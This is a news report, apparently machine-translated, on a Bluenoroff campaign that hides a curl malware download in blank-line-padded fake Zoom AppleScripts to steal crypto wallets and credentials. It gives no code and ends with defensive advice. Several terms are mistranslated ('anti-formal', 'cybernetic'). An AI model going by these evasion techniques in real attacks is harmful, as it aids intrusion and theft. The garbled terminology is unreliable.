- Zoom fake scripts launch malware hidden under thousands of code and blank space lines
- Launchdaemon ensures that malware is executed at the start with administrator rights once installed
- Malicious components disguise legitimate tools such as “Icloud_helper” and “Wi-Fi Updater”
A new cybernetic campaign that uses false zoom applications is pointing to organizations in North America, Europe and Asia-Pacific, experts have warned.
This cybernetic campaign, linked to the computer pirates of North Korea, is attributed to the Bluenoroff group, a known affiliate from the infamous Lazarus group, and the parodies of the legitimate videoconference services of Zoom to the silly victims.
Mainly focused on games, entertainment and Fintech sectors, this operation seems carefully coordinated and aims to compromise cryptocurrency wallets and other confidential financial data.
How the attack works
The operation begins with a deceptive applescript, designed to seem that it is performing Zoom SDK routine maintenance.
Analysts have found the padded script with around 10,000 lines in white to hide the malicious commands buried in the deep.
These commands, which are found in lines 10,017 and 10,018, use a curl application to silently download malware from a falsified domain: Zoom-Tech[.]us.
Once installed, the malware is embedded in the system using launching settings that execute the malicious payload at the beginning with high privileges.
Then additional components of the compromised infrastructure are recovered and disguised as normal macOS tools such as “icloud_helper” and “Wi-Fi Updater”.
These components erase temporary file traces and staging folders, using anti-formal methods to avoid detection while keeping access to the rear door for remote commands and data theft.
This method takes advantage of the common work scenario from home where technical problems are quickly solved with minimal scrutiny.
Malware goes beyond the simple theft of credentials. Actively look for cryptocurrency wallet extensions, browser session and authentication keys, confirming the continuous Bluenoroff approach on financial gain.
In a documented case, a Canadian online gambling company was attacked on May 28, when the attackers used false scripts of zoom problem solving to plant malware.
To stay safe, verify the participants of Zoom meetings independently, block the suspicious domains and use the protection of the end point because the attackers now use confidence and family workflows to pass basic protection.
It is also important to choose the best antivirus and ransomware protection software, especially for organizations with digital assets or cryptography holdings.
Companies must adopt identity theft protection to monitor exposed data and credentials, train social engineering risks and ensure cryptocurrency tools with hardware wallets.
Through Cyberseuritynews
